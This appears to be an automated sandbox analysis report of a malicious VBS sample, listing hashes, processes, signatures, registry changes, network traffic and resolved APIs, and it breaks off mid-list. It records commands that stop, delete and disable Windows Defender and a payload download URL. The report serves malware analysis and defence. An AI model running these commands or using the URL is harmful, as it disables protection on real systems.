VBS_b5964a141f9dbd403f703fabcb67a35d_php_2019-06-26_21_30.json

1.  
2. [*] MalFamily: ""
3.  
4. [*] MalScore: 10.0
5.  
6. [*] File Name: "VBS_b5964a141f9dbd403f703fabcb67a35d.php"
7. [*] File Size: 78441
8. [*] File Type: "Zip archive data, at least v2.0 to extract"
9. [*] SHA256: "768c9a779430e24806e214136c54f2846a0165fe999a567dbb9d44181c4d7e81"
10. [*] MD5: "b5964a141f9dbd403f703fabcb67a35d"
11. [*] SHA1: "69993f8f23add05b683b3f34ee11eb1a973d5055"
12. [*] SHA512: "c6f9748e0990d2836332bba09d57e642780ccaec467a46209accd24eb1f58f72287c359fffabaa547391fe2f0cfc426b7ebc2ba5f192d21dbab6cea5d6146852"
13. [*] CRC32: "680AAA93"
14. [*] SSDEEP: "1536:RL+mf26Li1mrzd/P8Nsh8HBGvdZ6BpJA+NeK8XZqMPUuZh++vuioeOt+BuIAAoCF:Ff26Li1Qmg3dug+oJqMPUuZ/uF5+ZPIw"
15.  
16. [*] Process Execution: [
17. "wscript.exe",
18. "rst.exe",
19. "cmd.exe",
20. "powershell.exe",
21. "cmd.exe",
22. "sc.exe",
23. "cmd.exe",
24. "sc.exe",
25. "cmd.exe",
26. "sc.exe",
27. "cmd.exe",
28. "sc.exe",
29. "cmd.exe",
30. "powershell.exe",
31. "svchost.exe",
32. "services.exe",
33. "lsass.exe",
34. "taskhost.exe",
35. "sc.exe",
36. "svchost.exe",
37. "svchost.exe",
38. "WerFault.exe",
39. "wermgr.exe"
40. ]
41.  
42. [*] Signatures Detected: [
43. {
44. "Description": "At least one process apparently crashed during execution",
45. "Details": []
46. },
47. {
48. "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
49. "Details": [
50. {
51. "IP": "67.23.226.169:80"
52. }
53. ]
54. },
55. {
56. "Description": "Creates RWX memory",
57. "Details": []
58. },
59. {
60. "Description": "Possible date expiration check, exits too soon after checking local time",
61. "Details": [
62. {
63. "process": "cmd.exe, PID 2036"
64. }
65. ]
66. },
67. {
68. "Description": "A process created a hidden window",
69. "Details": [
70. {
71. "Process": "rst.exe -> cmd"
72. },
73. {
74. "Process": "rst.exe -> cmd"
75. },
76. {
77. "Process": "rst.exe -> cmd"
78. }
79. ]
80. },
81. {
82. "Description": "Drops a binary and executes it",
83. "Details": [
84. {
85. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe"
86. }
87. ]
88. },
89. {
90. "Description": "Performs some HTTP requests",
91. "Details": [
92. {
93. "url": "http://pearlprofessionalmassage.co.nz/simpleresuct.gov"
94. }
95. ]
96. },
97. {
98. "Description": "Attempts to stop active services",
99. "Details": [
100. {
101. "servicename": "WinDefend"
102. }
103. ]
104. },
105. {
106. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
107. "Details": [
108. {
109. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13851600 times"
110. }
111. ]
112. },
113. {
114. "Description": "Spoofs its process name and/or associated pathname to appear as a legitimate process",
115. "Details": [
116. {
117. "modified_name": "svchost.exe",
118. "modified_path": "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe",
119. "original_name": "svchost.exe",
120. "original_path": "C:\\Windows\\system32\\svchost.exe"
121. }
122. ]
123. },
124. {
125. "Description": "Creates a hidden or system file",
126. "Details": [
127. {
128. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1f174e0.TMP"
129. }
130. ]
131. },
132. {
133. "Description": "Checks the system manufacturer, likely for anti-virtualization",
134. "Details": []
135. },
136. {
137. "Description": "Attempts to disable Windows Defender",
138. "Details": []
139. }
140. ]
141.  
142. [*] Started Service: [
143. "KeyIso",
144. "WerSvc",
145. "W32Time"
146. ]
147.  
148. [*] Executed Commands: [
149. "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe",
150. "\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
151. "cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
152. "\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend",
153. "cmd /c sc stop WinDefend",
154. "\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend",
155. "cmd /c sc delete WinDefend",
156. "C:\\Windows\\system32\\cmd.exe /c sc stop WinDefend",
157. "C:\\Windows\\system32\\cmd.exe /c sc delete WinDefend",
158. "C:\\Windows\\system32\\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
159. "C:\\Windows\\system32\\svchost.exe",
160. "powershell Set-MpPreference -DisableRealtimeMonitoring $true",
161. "sc stop WinDefend",
162. "sc delete WinDefend",
163. "C:\\Windows\\system32\\lsass.exe",
164. "taskhost.exe $(Arg0)",
165. "C:\\Windows\\system32\\sc.exe start w32time task_started",
166. "C:\\Windows\\system32\\svchost.exe -k LocalService",
167. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
168. "C:\\Windows\\system32\\WerFault.exe -u -p 1376 -s 288",
169. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\""
170. ]
171.  
172. [*] Mutexes: [
173. "Local\\ZoneAttributeCacheCounterMutex",
174. "Local\\ZonesCacheCounterMutex",
175. "Local\\ZonesLockedCacheCounterMutex",
176. "Global\\CLR_CASOFF_MUTEX",
177. "Global\\838B6C9EB27932960",
178. "Local\\WERReportingForProcess1376",
179. "Global\\\\xe5\\x88\\x90\\xc2\\xab",
180. "Global\\\\xe1\\x9f\\xa0\\xc6\\xbb",
181. "WERUI_BEX64-e0bfc78dc22baf57413d9e3a2494cb68424d695b"
182. ]
183.  
184. [*] Modified Files: [
185. "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe",
186. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-0000000000-0000000000-0000000000-1000\\00000000-0000-0000-0000-000000000000b_00000000-0000-0000-0000-000000000000",
187. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
188. "\\??\\PIPE\\srvsvc",
189. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\II18I4UZ54PZUJWBX0PM.temp",
190. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1f174e0.TMP",
191. "C:\\Windows\\SysWOW64\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
192. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\OT7ODX92J91JMMC81NCZ.temp",
193. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
194. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
195. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
196. "\\??\\PIPE\\lsarpc",
197. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA153.tmp.appcompat.txt",
198. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9EF.tmp.WERInternalMetadata.xml",
199. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA10.tmp.hdmp",
200. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB396.tmp.mdmp",
201. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERA153.tmp.appcompat.txt",
202. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERA9EF.tmp.WERInternalMetadata.xml",
203. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERAA10.tmp.hdmp",
204. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERB396.tmp.mdmp",
205. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\Report.wer",
206. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\Report.wer.tmp"
207. ]
208.  
209. [*] Deleted Files: [
210. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1f174e0.TMP",
211. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.3000.32601437",
212. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.3000.32601453",
213. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.3000.32601453",
214. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\OT7ODX92J91JMMC81NCZ.temp",
215. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2220.32602921",
216. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2220.32602921",
217. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2220.32602921",
218. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA153.tmp",
219. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA153.tmp.appcompat.txt",
220. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9EF.tmp",
221. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9EF.tmp.WERInternalMetadata.xml",
222. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA10.tmp",
223. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA10.tmp.hdmp",
224. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB396.tmp",
225. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB396.tmp.mdmp",
226. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\Report.wer.tmp"
227. ]
228.  
229. [*] Modified Registry Keys: [
230. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
231. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
232. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender",
233. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware",
234. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
235. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring",
236. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection",
237. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnRealtimeEnable",
238. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection",
239. "DisableNotifications",
240. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
241. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
242. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
243. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
244. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
245. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
246. ]
247.  
248. [*] Deleted Registry Keys: [
249. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
250. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
251. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
252. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
253. ]
254.  
255. [*] DNS Communications: [
256. {
257. "type": "A",
258. "request": "pearlprofessionalmassage.co.nz",
259. "answers": [
260. {
261. "data": "67.23.226.169",
262. "type": "A"
263. }
264. ]
265. }
266. ]
267.  
268. [*] Domains: [
269. {
270. "ip": "67.23.226.169",
271. "domain": "pearlprofessionalmassage.co.nz"
272. }
273. ]
274.  
275. [*] Network Communication - ICMP: []
276.  
277. [*] Network Communication - HTTP: [
278. {
279. "count": 1,
280. "body": "",
281. "uri": "http://pearlprofessionalmassage.co.nz/simpleresuct.gov",
282. "user-agent": "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)",
283. "method": "GET",
284. "host": "pearlprofessionalmassage.co.nz",
285. "version": "1.1",
286. "path": "/simpleresuct.gov",
287. "data": "GET /simpleresuct.gov HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: pearlprofessionalmassage.co.nz\r\n\r\n",
288. "port": 80
289. }
290. ]
291.  
292. [*] Network Communication - SMTP: []
293.  
294. [*] Network Communication - Hosts: []
295.  
296. [*] Network Communication - IRC: []
297.  
298. [*] Static Analysis: {
299. "office": {
300. "Metadata": {
301. "HasMacros": "No"
302. }
303. }
304. }
305.  
306. [*] Resolved APIs: [
307. "advapi32.dll.SaferIdentifyLevel",
308. "advapi32.dll.SaferComputeTokenFromLevel",
309. "advapi32.dll.SaferCloseLevel",
310. "ole32.dll.CLSIDFromProgIDEx",
311. "ole32.dll.CoGetClassObject",
312. "wscript.exe.#1",
313. "urlmon.dll.#326",
314. "urlmon.dll.#327",
315. "shell32.dll.#685",
316. "shell32.dll.#688",
317. "urlmon.dll.#395",
318. "cryptsp.dll.CryptAcquireContextW",
319. "cryptsp.dll.CryptGenRandom",
320. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
321. "winhttp.dll.WinHttpCheckPlatform",
322. "winhttp.dll.WinHttpOpen",
323. "winhttp.dll.WinHttpConnect",
324. "winhttp.dll.WinHttpOpenRequest",
325. "winhttp.dll.WinHttpCloseHandle",
326. "winhttp.dll.WinHttpSendRequest",
327. "winhttp.dll.WinHttpReceiveResponse",
328. "winhttp.dll.WinHttpAddRequestHeaders",
329. "winhttp.dll.WinHttpQueryHeaders",
330. "winhttp.dll.WinHttpReadData",
331. "winhttp.dll.WinHttpWriteData",
332. "winhttp.dll.WinHttpQueryDataAvailable",
333. "winhttp.dll.WinHttpQueryOption",
334. "winhttp.dll.WinHttpSetOption",
335. "winhttp.dll.WinHttpSetTimeouts",
336. "winhttp.dll.WinHttpCrackUrl",
337. "winhttp.dll.WinHttpCreateUrl",
338. "oleaut32.dll.#8",
339. "oleaut32.dll.#12",
340. "shlwapi.dll.StrRChrA",
341. "shlwapi.dll.StrCmpNW",
342. "oleaut32.dll.#4",
343. "oleaut32.dll.#6",
344. "kernel32.dll.RegQueryValueExW",
345. "oleaut32.dll.#2",
346. "kernel32.dll.RegCloseKey",
347. "oleaut32.dll.#9",
348. "ws2_32.dll.GetAddrInfoW",
349. "ws2_32.dll.WSASocketW",
350. "ws2_32.dll.#2",
351. "ws2_32.dll.#21",
352. "ws2_32.dll.#9",
353. "ws2_32.dll.WSAIoctl",
354. "ws2_32.dll.FreeAddrInfoW",
355. "ws2_32.dll.#6",
356. "ws2_32.dll.#5",
357. "ws2_32.dll.WSARecv",
358. "ws2_32.dll.WSASend",
359. "oleaut32.dll.#202",
360. "oleaut32.dll.#201",
361. "ole32.dll.CreateStreamOnHGlobal",
362. "oleaut32.dll.#411",
363. "oleaut32.dll.#23",
364. "oleaut32.dll.#24",
365. "ole32.dll.GetHGlobalFromStream",
366. "rpcrt4.dll.RpcBindingFree",
367. "oleaut32.dll.#500",
368. "cryptsp.dll.CryptReleaseContext",
369. "cryptsp.dll.CryptAcquireContextA",
370. "kernel32.dll.VirtualAlloc",
371. "ntdll.dll.memcpy",
372. "kernel32.dll.GetCurrentProcess",
373. "kernel32.dll.CloseHandle",
374. "advapi32.dll.OpenProcessToken",
375. "advapi32.dll.GetTokenInformation",
376. "kernel32.dll.Wow64EnableWow64FsRedirection",
377. "advapi32.dll.RegCloseKey",
378. "advapi32.dll.RegCreateKeyW",
379. "advapi32.dll.RegOpenKeyExW",
380. "advapi32.dll.RegSetValueExW",
381. "shell32.dll.ShellExecuteA",
382. "ole32.dll.OleInitialize",
383. "cryptbase.dll.SystemFunction036",
384. "ole32.dll.CreateBindCtx",
385. "ole32.dll.CoTaskMemAlloc",
386. "propsys.dll.PSCreateMemoryPropertyStore",
387. "propsys.dll.PSPropertyBag_WriteDWORD",
388. "ole32.dll.CoGetApartmentType",
389. "ole32.dll.CoRegisterInitializeSpy",
390. "ole32.dll.CoTaskMemFree",
391. "comctl32.dll.#236",
392. "ole32.dll.CoGetMalloc",
393. "propsys.dll.PSPropertyBag_ReadDWORD",
394. "propsys.dll.PSPropertyBag_ReadGUID",
395. "comctl32.dll.#320",
396. "comctl32.dll.#324",
397. "comctl32.dll.#323",
398. "advapi32.dll.RegEnumKeyW",
399. "advapi32.dll.OpenThreadToken",
400. "ole32.dll.StringFromGUID2",
401. "apphelp.dll.ApphelpCheckShellObject",
402. "ole32.dll.CoCreateInstance",
403. "urlmon.dll.CreateUri",
404. "kernel32.dll.InitializeSRWLock",
405. "kernel32.dll.AcquireSRWLockExclusive",
406. "kernel32.dll.AcquireSRWLockShared",
407. "kernel32.dll.ReleaseSRWLockExclusive",
408. "kernel32.dll.ReleaseSRWLockShared",
409. "comctl32.dll.#328",
410. "comctl32.dll.#334",
411. "shell32.dll.#102",
412. "propsys.dll.PSPropertyBag_ReadStrAlloc",
413. "ole32.dll.CoInitializeEx",
414. "advapi32.dll.InitializeSecurityDescriptor",
415. "advapi32.dll.SetEntriesInAclW",
416. "ntmarta.dll.GetMartaExtensionInterface",
417. "advapi32.dll.SetSecurityDescriptorDacl",
418. "advapi32.dll.IsTextUnicode",
419. "comctl32.dll.#332",
420. "comctl32.dll.#338",
421. "comctl32.dll.#339",
422. "ole32.dll.CoUninitialize",
423. "sechost.dll.ConvertSidToStringSidW",
424. "profapi.dll.#104",
425. "propsys.dll.#430",
426. "advapi32.dll.RegGetValueW",
427. "ole32.dll.CoTaskMemRealloc",
428. "propsys.dll.InitPropVariantFromStringAsVector",
429. "propsys.dll.PSCoerceToCanonicalValue",
430. "propsys.dll.PropVariantToStringAlloc",
431. "ole32.dll.PropVariantClear",
432. "ole32.dll.CoAllowSetForegroundWindow",
433. "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
434. "setupapi.dll.CM_Get_Device_Interface_List_ExW",
435. "shell32.dll.SHGetFolderPathW",
436. "advapi32.dll.SaferGetPolicyInformation",
437. "comctl32.dll.#386",
438. "ntdll.dll.RtlDllShutdownInProgress",
439. "comctl32.dll.#329",
440. "ole32.dll.OleUninitialize",
441. "ole32.dll.CoRevokeInitializeSpy",
442. "comctl32.dll.#388",
443. "advapi32.dll.CryptAcquireContextA",
444. "advapi32.dll.CryptImportKey",
445. "advapi32.dll.CryptEncrypt",
446. "cryptsp.dll.CryptImportKey",
447. "cryptbase.dll.SystemFunction040",
448. "cryptbase.dll.SystemFunction041",
449. "cryptsp.dll.CryptEncrypt",
450. "advapi32.dll.UnregisterTraceGuids",
451. "comctl32.dll.#321",
452. "kernel32.dll.SetThreadUILanguage",
453. "kernel32.dll.CopyFileExW",
454. "kernel32.dll.IsDebuggerPresent",
455. "kernel32.dll.SetConsoleInputExeNameW",
456. "kernel32.dll.SortGetHandle",
457. "kernel32.dll.SortCloseHandle",
458. "uxtheme.dll.ThemeInitApiHook",
459. "user32.dll.IsProcessDPIAware",
460. "shell32.dll.#66",
461. "comctl32.dll.#385",
462. "comctl32.dll.#336",
463. "comctl32.dll.#333",
464. "linkinfo.dll.IsValidLinkInfo",
465. "propsys.dll.#417",
466. "propsys.dll.PSGetNameFromPropertyKey",
467. "propsys.dll.PSStringFromPropertyKey",
468. "propsys.dll.InitVariantFromBuffer",
469. "propsys.dll.PropVariantToGUID",
470. "linkinfo.dll.CreateLinkInfoW",
471. "user32.dll.IsCharAlphaW",
472. "user32.dll.CharPrevW",
473. "ntshrui.dll.GetNetResourceFromLocalPathW",
474. "srvcli.dll.NetShareEnum",
475. "cscapi.dll.CscNetApiGetInterface",
476. "slc.dll.SLGetWindowsInformationDWORD",
477. "shlwapi.dll.PathRemoveFileSpecW",
478. "linkinfo.dll.DestroyLinkInfo",
479. "propsys.dll.PropVariantToBoolean",
480. "advapi32.dll.GetSecurityInfo",
481. "advapi32.dll.SetSecurityInfo",
482. "advapi32.dll.GetSecurityDescriptorControl",
483. "advapi32.dll.RegQueryInfoKeyW",
484. "advapi32.dll.RegEnumKeyExW",
485. "advapi32.dll.RegEnumValueW",
486. "advapi32.dll.RegQueryValueExW",
487. "shlwapi.dll.UrlIsW",
488. "kernel32.dll.InitializeCriticalSectionAndSpinCount",
489. "msvcrt.dll._set_error_mode",
490. "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
491. "kernel32.dll.FindActCtxSectionStringW",
492. "kernel32.dll.GetSystemWindowsDirectoryW",
493. "mscoree.dll.GetProcessExecutableHeap",
494. "mscorwks.dll.DllGetClassObjectInternal",
495. "mscorwks.dll.GetCLRFunction",
496. "advapi32.dll.RegisterTraceGuidsW",
497. "advapi32.dll.GetTraceLoggerHandle",
498. "advapi32.dll.GetTraceEnableLevel",
499. "advapi32.dll.GetTraceEnableFlags",
500. "advapi32.dll.TraceEvent",
501. "mscoree.dll.IEE",
502. "mscorwks.dll.IEE",
503. "mscoree.dll.GetStartupFlags",
504. "mscoree.dll.GetHostConfigurationFile",
505. "mscoree.dll.GetCORSystemDirectory",
506. "ntdll.dll.RtlVirtualUnwind",
507. "kernel32.dll.IsWow64Process",
508. "advapi32.dll.AllocateAndInitializeSid",
509. "advapi32.dll.InitializeAcl",
510. "advapi32.dll.AddAccessAllowedAce",
511. "advapi32.dll.FreeSid",
512. "kernel32.dll.SetThreadStackGuarantee",
513. "kernel32.dll.FlsSetValue",
514. "kernel32.dll.FlsGetValue",
515. "kernel32.dll.FlsAlloc",
516. "kernel32.dll.FlsFree",
517. "kernel32.dll.AddVectoredContinueHandler",
518. "kernel32.dll.RemoveVectoredContinueHandler",
519. "advapi32.dll.ConvertSidToStringSidW",
520. "kernel32.dll.FlushProcessWriteBuffers",
521. "kernel32.dll.GetWriteWatch",
522. "kernel32.dll.ResetWriteWatch",
523. "kernel32.dll.CreateMemoryResourceNotification",
524. "kernel32.dll.QueryMemoryResourceNotification",
525. "kernel32.dll.GlobalMemoryStatusEx",
526. "ole32.dll.CoGetContextToken",
527. "oleaut32.dll.#149",
528. "kernel32.dll.GetUserDefaultUILanguage",
529. "kernel32.dll.GetVersionExW",
530. "kernel32.dll.GetFullPathNameW",
531. "kernel32.dll.SetErrorMode",
532. "kernel32.dll.GetFileAttributesExW",
533. "version.dll.GetFileVersionInfoSizeW",
534. "version.dll.GetFileVersionInfoW",
535. "version.dll.VerQueryValueW",
536. "kernel32.dll.lstrlen",
537. "kernel32.dll.lstrlenW",
538. "mscoree.dll.ND_RI2",
539. "kernel32.dll.lstrcpy",
540. "kernel32.dll.lstrcpyW",
541. "version.dll.VerLanguageNameW",
542. "kernel32.dll.GetCurrentProcessId",
543. "advapi32.dll.LookupPrivilegeValueW",
544. "advapi32.dll.AdjustTokenPrivileges",
545. "kernel32.dll.OpenProcess",
546. "psapi.dll.EnumProcessModules",
547. "psapi.dll.GetModuleInformation",
548. "psapi.dll.GetModuleBaseNameW",
549. "psapi.dll.GetModuleFileNameExW",
550. "kernel32.dll.GetExitCodeProcess",
551. "ntdll.dll.NtQuerySystemInformation",
552. "user32.dll.EnumWindows",
553. "user32.dll.GetWindowThreadProcessId",
554. "kernel32.dll.WerSetFlags",
555. "kernel32.dll.SetThreadPreferredUILanguages",
556. "kernel32.dll.GetThreadPreferredUILanguages",
557. "kernel32.dll.GetUserDefaultLocaleName",
558. "kernel32.dll.GetEnvironmentVariableW",
559. "advapi32.dll.CryptReleaseContext",
560. "advapi32.dll.CryptCreateHash",
561. "advapi32.dll.CryptDestroyHash",
562. "advapi32.dll.CryptHashData",
563. "advapi32.dll.CryptGetHashParam",
564. "advapi32.dll.CryptExportKey",
565. "advapi32.dll.CryptGenKey",
566. "advapi32.dll.CryptGetKeyParam",
567. "advapi32.dll.CryptDestroyKey",
568. "advapi32.dll.CryptVerifySignatureA",
569. "advapi32.dll.CryptSignHashA",
570. "advapi32.dll.CryptGetProvParam",
571. "advapi32.dll.CryptGetUserKey",
572. "advapi32.dll.CryptEnumProvidersA",
573. "cryptsp.dll.CryptHashData",
574. "cryptsp.dll.CryptGetHashParam",
575. "cryptsp.dll.CryptDestroyHash",
576. "cryptsp.dll.CryptDestroyKey",
577. "mscoree.dll.GetTokenForVTableEntry",
578. "mscoree.dll.SetTargetForVTableEntry",
579. "mscoree.dll.GetTargetForVTableEntry",
580. "culture.dll.ConvertLangIdToCultureName",
581. "ole32.dll.CoCreateGuid",
582. "kernel32.dll.CreateFileW",
583. "kernel32.dll.GetConsoleScreenBufferInfo",
584. "kernel32.dll.LocalFree",
585. "kernel32.dll.LocalAlloc",
586. "mscoree.dll.ND_RI4",
587. "advapi32.dll.DuplicateTokenEx",
588. "advapi32.dll.CheckTokenMembership",
589. "kernel32.dll.GetConsoleTitleW",
590. "mscorjit.dll.getJit",
591. "kernel32.dll.SetConsoleTitleW",
592. "kernel32.dll.SetConsoleCtrlHandler",
593. "kernel32.dll.CreateEventW",
594. "ntdll.dll.WinSqmIsOptedIn",
595. "kernel32.dll.ExpandEnvironmentStringsW",
596. "shfolder.dll.SHGetFolderPathW",
597. "kernel32.dll.SetEnvironmentVariableW",
598. "kernel32.dll.GetACP",
599. "kernel32.dll.UnmapViewOfFile",
600. "kernel32.dll.GetFileType",
601. "kernel32.dll.ReadFile",
602. "kernel32.dll.GetSystemInfo",
603. "kernel32.dll.VirtualQuery",
604. "secur32.dll.GetUserNameExW",
605. "advapi32.dll.GetUserNameW",
606. "kernel32.dll.ReleaseMutex",
607. "advapi32.dll.RegisterEventSourceW",
608. "advapi32.dll.DeregisterEventSource",
609. "advapi32.dll.ReportEventW",
610. "kernel32.dll.GetLogicalDrives",
611. "kernel32.dll.GetDriveTypeW",
612. "kernel32.dll.GetVolumeInformationW",
613. "kernel32.dll.GetCurrentDirectoryW",
614. "kernel32.dll.GetLastError",
615. "kernel32.dll.GetStdHandle",
616. "kernel32.dll.GetConsoleMode",
617. "kernel32.dll.SetEvent",
618. "kernel32.dll.FindFirstFileW",
619. "kernel32.dll.FindClose",
620. "mscoree.dll.DllGetClassObject",
621. "diasymreader.dll.DllGetClassObjectInternal",
622. "kernel32.dll.GetConsoleOutputCP",
623. "gdi32.dll.TranslateCharsetInfo",
624. "kernel32.dll.SetConsoleTextAttribute",
625. "kernel32.dll.WriteConsoleW",
626. "mscoree.dll.CorExitProcess",
627. "mscorwks.dll.CorExitProcess",
628. "mscorwks.dll._CorDllMain",
629. "kernel32.dll.CreateActCtxW",
630. "kernel32.dll.AddRefActCtx",
631. "kernel32.dll.ReleaseActCtx",
632. "kernel32.dll.ActivateActCtx",
633. "kernel32.dll.DeactivateActCtx",
634. "kernel32.dll.GetCurrentActCtx",
635. "kernel32.dll.QueryActCtxW",
636. "netutils.dll.NetApiBufferFree",
637. "kernel32.dll.IsProcessorFeaturePresent",
638. "ntdll.dll.RtlUnwind",
639. "mscoree.dll._CorExeMain",
640. "mscoree.dll._CorImageUnloading",
641. "mscoree.dll._CorValidateImage",
